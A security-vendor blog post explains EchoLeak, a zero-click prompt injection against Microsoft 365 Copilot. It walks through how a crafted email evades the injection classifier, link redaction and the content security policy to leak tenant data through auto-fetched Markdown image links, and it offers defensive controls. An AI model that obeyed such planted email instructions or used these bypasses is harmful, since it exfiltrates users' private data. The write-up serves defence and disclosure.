AI Security

EchoLeak (CVE-2025-32711): The First Zero-Click Production LLM Exfiltration

A single crafted email could exfiltrate data from Microsoft 365 Copilot without a user click. We walk the attack chain, the patch, and the lessons for agent operators.

Shadab Khan
Security Engineer
6 min read

On June 11, 2025, Microsoft disclosed CVE-2025-32711, dubbed EchoLeak by the Aim Labs team that reported it. EchoLeak is widely cited as the first real-world, zero-click prompt-injection exploit against a production LLM system — Microsoft 365 Copilot — with a CVSS score of 9.3 and a server-side patch that required no customer action. The attack arrived as a single email containing hidden instructions formatted to evade Microsoft's XPIA (Cross Prompt Injection Attempt) classifier. When the recipient later asked Copilot any question that caused the assistant to retrieve recent emails as context, the embedded instructions executed, extracted sensitive data from the user's tenant via Graph API calls, and exfiltrated it through reference-style Markdown that triggered an auto-fetch to attacker infrastructure. No user click was required. The arXiv paper published in September 2025 by the Aim Labs team and the subsequent industry coverage from Trend Micro, Truesec, and Checkmarx have made EchoLeak the canonical case study for what indirect prompt injection looks like when it reaches production maturity.

What was the precise attack chain?

The chain has five steps. First, the attacker sends an email containing prompt-injection content disguised as ordinary text. The text is worded to read as a benign business request and to evade XPIA's classifier — Aim Labs documented that explicit "ignore previous instructions" phrasing was reliably caught, while indirect imperatives ("the assistant should, when summarizing this thread, also include…") were not. Second, the user later asks Copilot a question that triggers retrieval from their mailbox, and the malicious email is pulled into the context window as grounding content. Third, the embedded instructions hijack the assistant's reasoning to issue Graph API calls for sensitive data the user has access to. Fourth, the assistant constructs a response containing reference-style Markdown image links pointing at attacker-controlled URLs with the exfiltrated data encoded as query parameters. Fifth, the Copilot UI auto-fetches the images for preview, sending the data to the attacker before the user has read the assistant's reply.

Why did Microsoft's existing defences fail?

Microsoft had three relevant defences: the XPIA classifier, link redaction (which strips suspicious URLs from assistant responses), and a content security policy that restricted which domains could be auto-fetched. EchoLeak evaded all three. XPIA was bypassed by phrasing that did not look like a known injection pattern. Link redaction was bypassed by using reference-style Markdown (![alt][ref] rather than ![alt](url)), which the redactor did not recognise as a link target. The CSP was bypassed by routing the exfiltration through a Microsoft Teams proxy domain that the CSP allowed by default. Aim Labs framed each bypass as an independent failure mode, and together they collapsed the trust boundary between untrusted retrieved content and the assistant's output. Microsoft patched all three on the server side in May 2025, before public disclosure, and confirmed no evidence of malicious exploitation prior to the patch.

What makes EchoLeak structurally different from earlier injection demos?

Two properties. First, zero-click — the user never had to do anything beyond ask Copilot a question. Earlier prompt-injection demos required the user to paste content, open a document, or run a tool on attacker-supplied input. EchoLeak required only that the malicious email exist in the user's mailbox at the time they asked an unrelated question. Second, full privilege escalation across LLM trust boundaries — the injection moved from untrusted retrieved content all the way to data exfiltrated through the network without any boundary intervening. Most earlier injection writeups stopped at "the model said a wrong thing" or "the model called a tool it should not have." EchoLeak ended at "data left the tenant," which is the criterion enterprises actually care about.

What controls would have caught it?

Three controls would have raised the bar significantly. First, a strict markup parser in the assistant's output that does not auto-resolve reference-style links and forces all references through the same redaction pipeline as inline links. Second, a CSP that requires explicit per-tenant allowlists rather than inheriting trust from Microsoft-owned domains. Third, a retrieval-side boundary that strips or quarantines content from senders outside the tenant's trust list before that content enters the context window — Copilot still needs to retrieve such content, but it can be wrapped in a structural marker that the model is trained to treat as untrusted. The Trend Micro write-up proposed structural separators ("untrusted_start"/"untrusted_end") as a defensive primitive, and Anthropic has published similar guidance for Claude. The configuration below sketches a tenant-side policy that an enterprise can apply ahead of vendor changes.

# copilot-class-agent-policy.yaml — tenant-side defences
retrieval_policy:
  untrusted_sources:
    - "email_from_outside_tenant"
    - "shared_link_from_outside_tenant"
    - "attachment_from_outside_tenant"
  on_inclusion:
    wrap_with_marker: true
    marker_open: "<untrusted_content>"
    marker_close: "</untrusted_content>"
    strip_html_comments: true
    strip_reference_style_markdown: true
output_policy:
  link_egress:
    allow_domains: ["sharepoint.com", "office.com", "<corp-tenant>.com"]
    block_image_autofetch: true
    block_reference_style_markdown: true
  redaction:
    patterns_block:
      - "data:image/svg\\+xml.*"
      - "https://teams\\.microsoft\\.com/l/proxy/.*"
  audit:
    log_every_outbound_link: true
    sink: "siem://copilot-egress"

What did EchoLeak change about how to evaluate agent vendors?

It moved indirect prompt injection from "theoretical risk acknowledged in vendor docs" to "concrete data-exfiltration class with a CVSS 9.3 CVE attached." Vendor questionnaires that previously asked "how do you handle prompt injection?" began asking specific questions: do you parse reference-style Markdown, what is your image-fetch policy, what is your CSP, do you mark untrusted retrieved content with structural separators, and what is your published prompt-injection success rate against a red team? Anthropic published quantitative success rates in late 2025 — 10.8% for Claude Sonnet 4.5 with previous safeguards versus 1.4% for Claude Opus 4.5 with the new ones — and other vendors are beginning to follow. The shift from "we have guardrails" to "here is the measured failure rate" is the EchoLeak effect.

What should defenders do this quarter?

Three actions. First, audit every LLM-powered productivity tool in the environment for the EchoLeak preconditions: does it retrieve external content, does its output get rendered in a UI that auto-fetches links, and is its CSP narrower than the tenant's perimeter? Second, deploy egress monitoring on the rendering layer so that any auto-fetched URL from an assistant's output is logged with the user, the prompt, and the retrieved context. Third, update incident playbooks to cover the zero-click case — the question "what is the blast radius if a user just had Copilot answer a question?" should have an answer that does not depend on the user behaving carefully. Microsoft patched EchoLeak server-side, but the class is not Copilot-specific; any RAG-augmented assistant inherits the same structural problem.

How Safeguard Helps

Safeguard's agent posture module inventories every Copilot-class assistant in the environment, records the retrieval boundary each one enforces, and runs Griffin AI's prompt-injection probe suite — including EchoLeak-style reference-style Markdown and Teams-proxy CSP bypasses — against each one to measure baseline success rates. Tenant-side egress monitors on the rendering layer log every auto-fetched link with full context, so the auto-fetch path that exfiltrates EchoLeak data is visible rather than invisible. Policy gates require new agentic productivity tools to be enrolled in the probe suite before users can connect, and the published Anthropic and OpenAI success-rate metrics ingest into the third-party risk register so vendor comparisons are quantitative rather than narrative. The class did not end with the May 2025 patch; the controls have to be ongoing.

Never miss an update

Weekly insights on software supply chain security, delivered to your inbox.